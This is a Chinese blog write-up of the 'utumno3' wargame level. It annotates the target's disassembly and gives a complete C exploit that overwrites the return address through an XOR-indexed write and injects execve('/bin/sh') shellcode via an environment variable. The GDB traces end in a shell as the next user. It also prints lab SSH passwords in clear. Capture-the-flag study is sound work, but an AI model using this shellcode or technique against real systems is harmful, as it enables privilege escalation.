utumno - 3

最新推荐文章于 2021-05-15 16:21:14 发布

shuimuyq

最新推荐文章于 2021-05-15 16:21:14 发布

阅读量724

点赞数

CC 4.0 BY-SA版权

分类专栏： wargames wargames-writeup

本文链接：https://blog.youkuaiyun.com/shuimuyq/article/details/51097803

wargames-writeup 同时被 2 个专栏收录

26 篇文章

订阅专栏

wargames

25 篇文章

订阅专栏

本文介绍了一个具体的逆向破解实例过程，通过分析程序的汇编代码，理解其加密逻辑，并利用GDB进行逐步跟踪，最终成功构造了用于提权的shellcode。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

   ┌──────────────────────────────────────────────────────────┐esp+0x38 chr
   │0x80483fd <main>        push   %ebp                       │esp+0x3c cnt
   │0x80483fe <main+1>      mov    %esp,%ebp                  │esp+0x08 buf
   │0x8048400 <main+3>      push   %ebx                       │
   │0x8048401 <main+4>      and    $0xfffffff0,%esp           │
   │0x8048404 <main+7>      sub    $0x40,%esp                 │
   │0x8048407 <main+10>     movl   $0x0,0x38(%esp)            │
   │0x804840f <main+18>     mov    0x38(%esp),%eax            │
   │0x8048413 <main+22>     mov    %eax,0x3c(%esp)            │
   │0x8048417 <main+26>     jmp    0x804846e <main+113>       │

   │0x8048419 <main+28>     mov    0x38(%esp),%eax            │
   │0x804841d <main+32>     lea    0x8(%esp),%ecx             │
   │0x8048421 <main+36>     mov    0x3c(%esp),%edx            │
   │0x8048425 <main+40>     add    %ecx,%edx                  │
   │0x8048427 <main+42>     mov    %al,(%edx)                 │buf[cnt] = chr

   │0x8048429 <main+44>     lea    0x8(%esp),%edx             │
   │0x804842d <main+48>     mov    0x3c(%esp),%eax            │
   │0x8048431 <main+52>     add    %edx,%eax                  │
   │0x8048433 <main+54>     movzbl (%eax),%ecx                │ecx = 0x00-00-00-chr

   │0x8048436 <main+57>     mov    0x3c(%esp),%eax            │
   │0x804843a <main+61>     mov    %eax,%edx                  │
   │0x804843c <main+63>     mov    %edx,%eax                  │edx = eax = cnt

   │0x804843e <main+65>     add    %eax,%eax                  │eax += eax

   │0x8048440 <main+67>     add    %edx,%eax                  │eax += edx

   │0x8048442 <main+69>     xor    %ecx,%eax                  │eax = (cnt * 3) ^ ecx

   │0x8048444 <main+71>     lea    0x8(%esp),%ecx             │
   │0x8048448 <main+75>     mov    0x3c(%esp),%edx            │
   │0x804844c <main+79>     add    %ecx,%edx                  │
   │0x804844e <main+81>     mov    %al,(%edx)                 │buf[cnt] = al

   │0x8048450 <main+83>     lea    0x8(%esp),%edx             │
   │0x8048454 <main+87>     mov    0x3c(%esp),%eax            │
   │0x8048458 <main+91>     add    %edx,%eax                  │
   │0x804845a <main+93>     movzbl (%eax),%eax                │eax = 0x00-00-00-buf[cnt]
   │0x804845d <main+96>     movsbl %al,%ebx                   │ebx = 0x??-??-??-buf[cnt]
   │0x8048460 <main+99>     call   0x80482d0 <getchar@plt>    │
   │0x8048465 <main+104>    mov    %al,0x20(%esp,%ebx,1)      │[esp + ebx * 1 + 20h] = al
   │0x8048469 <main+108>    addl   $0x1,0x3c(%esp)            │

   │0x804846e <main+113>    call   0x80482d0 <getchar@plt>    │
   │0x8048473 <main+118>    mov    %eax,0x38(%esp)            │chr = getchar();

   │0x8048477 <main+122>    cmpl   $0xffffffff,0x38(%esp)     │
   │0x804847c <main+127>    je     0x8048485 <main+136>       │
   │0x804847e <main+129>    cmpl   $0x17,0x3c(%esp)           │
   │0x8048483 <main+134>    jle    0x8048419 <main+28>        │
   │0x8048485 <main+136>    mov    $0x0,%eax                  │
   │0x804848a <main+141>    mov    -0x4(%ebp),%ebx            │
   │0x804848d <main+144>    leave                             │
   │0x804848e <main+145>    ret                               │
   └──────────────────────────────────────────────────────────┘

<========================================================>
MOVSBL and MOVZBL
* MOVSBL sign-extends a single byte, and copies it into a
double-word destination
* MOVZBL expands a single byte to 32 bits with 24 leading
zeros, and copies it into a double-word destination

Example:
%eax = 0x12345678
%edx = 0xAAAABBBB
MOVB %dh, %al         %eax = 0x123456BB
MOVSBL %dh, %eax      %eax = 0xFFFFFFBB
MOVZBL %dh, %eax      %eax = 0x000000BB
<========================================================>

<========================================================>
cnt = 1, cnt * 3 = 3
0000-0011
(^)
0010-1111 => \x2f
(=)
0010-1100 = 0x2c ==> esp[20 + 2c]

cnt = 2, cnt * 3 = 6
0000-0110
(^)
0010-1011 => \x2b
(=)
0010-1101 = 0x2d ==> esp[20 + 2d]

cnt = 3, cnt * 3 = 9
0000-1001
(^)
0010-0111 => \x27
(=)
0010-1110 = 0x2e ==> esp[20 + 2e]

cnt = 4, cnt * 3 = 12
0000-1100
(^)
0010-0011 => \x23
(=)
0010-1111 = 0x2f ==> esp[20 + 2f]

cnt = 5, cnt * 3 = 15
0000-1111
(^)
0000-1111 => \x0f
(=)
0000-0000 = 0x00 ==> esp[20 + 00]

...
<========================================================>

root@today:~/Desktop/misc/utumno/utumno3# ssh utumno3@178.79.134.250

utumno3@178.79.134.250's password: zuudafiine

utumno3@melinda:~$ mkdir /tmp/utu3

utumno3@melinda:~$ cd /tmp/utu3

utumno3@melinda:/tmp/utu3$ cat hacker.c

#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
        char buffer[2048] = {0};
        int pfd[2] = {0};
        pid_t pid;

        if (pipe(pfd))
                return 0;

        pid = fork();
        if (pid > 0){
                close(pfd[0]);
                write(pfd[1],	"\x01\x55\x2f\xcf\x2b\xdf\x27\xff\x23\xff"
				"\x0f\x55\x12\x55\x15\x55\x18\x55\x1b\x55"
				"\x1e\x55\x21\x55\x24\x55\x27\x55\x2a\x55"
				"\x2d\x55\x30\x55\x33\x55\x36\x55\x39\x55"
				"\x3c\x55\x3f\x55\x42\x55\x45\x55\x48\x55", 50);

#if 1	/* when use gdb, turn 1 to 0 */
                while (gets(buffer)) {
                    buffer[strlen(buffer) + 1] = '\0';
                    buffer[strlen(buffer)] = '\n';
                    write(pfd[1], buffer, strlen(buffer));
                }
#endif

                close(pfd[1]);
        } else if (pid == 0) {
                close(pfd[1]);
                close(STDIN_FILENO);
                dup2(pfd[0], STDIN_FILENO);

		char *envp[] = {
			"EGG=\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80",
			NULL
		};
                execle("/utumno/utumno3", "/utumno/utumno3", NULL, envp);
                close(pfd[0]);
        }

        return 0;
}

utumno3@melinda:/tmp/utu3$ gcc hacker.c -o hacker -g -m32
hacker.c: In function 'main':
hacker.c:29:17: warning: 'gets' is deprecated (declared at /usr/include/stdio.h:638) [-Wdeprecated-declarations]
                 while (gets(buffer)) {
                 ^
./cco5rNKN.o: In function `main':
/tmp/utu3/hacker.c:29: warning: the `gets' function is dangerous and should not be used.


utumno3@melinda:/tmp/utu3$ gdb -tui hacker

(gdb) b *main
Breakpoint 1 at 0x80485bd: file hacker.c, line 8.
(gdb) run
Starting program: /tmp/utu3/hacker 

Breakpoint 1, main (argc=1, argv=0xffffd624) at hacker.c:8
(gdb) set follow-fork-mode child
(gdb) c
Continuing.
[New process 20273]
process 20273 is executing new program: /games/utumno/utumno3
[Switching to process 20273]

Breakpoint 1, main (argc=1, argv=0xffffdee4) at utumno3.c:20
(gdb) layout asm

(gdb) x/10000dbc $esp
...
0xffffdfb4:     0 '\000'        0 '\000'        0 '\000'        0 '\000'        0 '\000'        0 '\000'        0 '\000'        47 '/'
0xffffdfbc:     117 'u' 116 't' 117 'u' 109 'm' 110 'n' 111 'o' 47 '/'  117 'u'
0xffffdfc4:     116 't' 117 'u' 109 'm' 110 'n' 111 'o' 51 '3'  0 '\000'        69 'E'
0xffffdfcc:     71 'G'  71 'G'  61 '='  106 'j' 11 '\v' 88 'X'  49 '1'  -10 '\366'
0xffffdfd4:     86 'V'  104 'h' 47 '/'  47 '/'  115 's' 104 'h' 104 'h' 47 '/'
0xffffdfdc:     98 'b'  105 'i' 110 'n' -119 '\211'     -29 '\343'      49 '1'  -55 '\311'      -119 '\211'
0xffffdfe4:     -54 '\312'      -51 '\315'      -128 '\200'     0 '\000'        47 '/'  117 'u' 116 't' 117 'u'
0xffffdfec:     109 'm' 110 'n' 111 'o' 47 '/'  117 'u' 116 't' 117 'u' 109 'm'
0xffffdff4:     110 'n' 111 'o' 51 '3'  0 '\000'        0 '\000'        0 '\000'        0 '\000'        0 '\000'
0xffffdffc:     0 '\000'        0 '\000'        0 '\000'        0 '\000'        Cannot access memory at address 0xffffe000

(gdb) x/8s 0xffffdfb4
0xffffdfb4:     ""
0xffffdfb5:     ""
0xffffdfb6:     ""
0xffffdfb7:     ""
0xffffdfb8:     ""
0xffffdfb9:     ""
0xffffdfba:     ""
0xffffdfbb:     "/utumno/utumno3"
0xffffdfcb:     "EGG=j\vX1\366Vh//shh/bin\211\343\061\311\211\312\315\200"
0xffffdfe8:     "/utumno/utumno3"
0xffffdff8:     ""

(gdb) x/24dbx 0xffffdfcf
0xffffdfcf:     0x6a    0x0b    0x58    0x31    0xf6    0x56    0x68    0x2f
0xffffdfd7:     0x2f    0x73    0x68    0x68    0x2f    0x62    0x69    0x6e
0xffffdfdf:     0x89    0xe3    0x31    0xc9    0x89    0xca    0xcd    0x80

#so the shellcode is in the address of 0xffffdfcf

(gdb) b *main+113

(gdb) c (#24 times)

Breakpoint 2, main (argc=1, argv=0xffffdee4) at utumno3.c:27
(gdb) x/4dbx $esp+0x3c
0xffffde3c:     0x18    0x00    0x00    0x00

(gdb) x/8dbx $ebp
0xffffde48:     0x00    0x00    0x00    0x00    0xcf    0xdf    0xff    0xff

#we set the eip to our shellcode address
#after main return, shellcode will be run

utumno3@melinda:/tmp/utu3$ ./hacker 
whoami
utumno4
cat /etc/utumno_pass/utumno4
oogieleoga